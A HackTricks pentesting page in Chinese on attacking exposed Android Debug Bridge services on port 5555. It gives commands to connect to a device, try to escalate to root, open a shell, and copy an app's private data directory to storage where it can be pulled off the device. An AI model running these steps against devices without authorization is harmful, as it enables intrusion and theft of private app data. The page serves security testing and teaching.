hacktricks/network-services-pentesting/5555-android-debug-bridge.md

3.3 KiB
Raw Blame History

5555 - Android Debug Bridge

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

其他支持HackTricks的方式

基本信息

来自文档

Android Debug Bridgeadb是一个多功能的命令行工具可让您与设备通信。 adb命令可实现各种设备操作安装和调试应用程序,并提供访问Unix shell的权限,您可以使用它在设备上运行各种命令。

默认端口5555。

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

连接

如果发现设备上某个端口运行着ADB服务并且你可以连接到它你就可以在系统内部获取一个shell

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

转储应用数据

为了完全下载一个应用程序的数据,您可以:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Shodan

  • 安卓调试桥
从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS红队专家

其他支持HackTricks的方式